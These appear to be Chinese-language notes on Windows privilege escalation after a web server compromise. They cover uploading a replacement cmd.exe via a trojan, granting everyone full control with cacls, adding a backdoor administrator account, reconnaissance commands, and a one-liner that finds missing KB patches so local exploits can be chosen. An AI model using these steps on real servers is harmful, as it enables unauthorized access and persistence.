Windows提权
忽略第三方软件和数据库
服务器通常不打补丁
cmd无回显不执行命令的原因?怎么处理?
原因:由于cmd被降权或删除
处理:上传一个新的cmd.exe(通过木马)。上传到可读写的目录下(一般网站目录下有iuser权限)
设置路径:setp D:\test\cmd.exe
设置权限:cacls “D:\test” /t /p everyone:f (cacls /?——查询cacls用法)
用到的命令
net user test 111 /add ——添加用户名为test,密码为111
net localgroup administrators test /add ——将用户名为test的用户添加到管理员组
net user test /del ——删除test用户
whoami ——查看用户权限
systeminfo ——查看操作系统,补丁情况
ipconfig——查看当前服务器IP ipconfig /all
net user——查看当前用户情况
netstat ——查看当前网络连接情况
netstat –ano ——查看包含UDP的网络连接情况
/netstat –an | find “ESTABLISHED” —— 只查询连接成功的情况
tasklist ——查看当前进程情况 tasklist /svc
taskkill ——结束进程 taskkill -PID xx (管理员权限)
net start 服务——启动服务
net stop 服务——停止服务(管理员权限)
实战
1、查找哪些漏洞可以利用
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i “%i”|| @echo %i you can fuck)&del /f /q /a micropoor.txt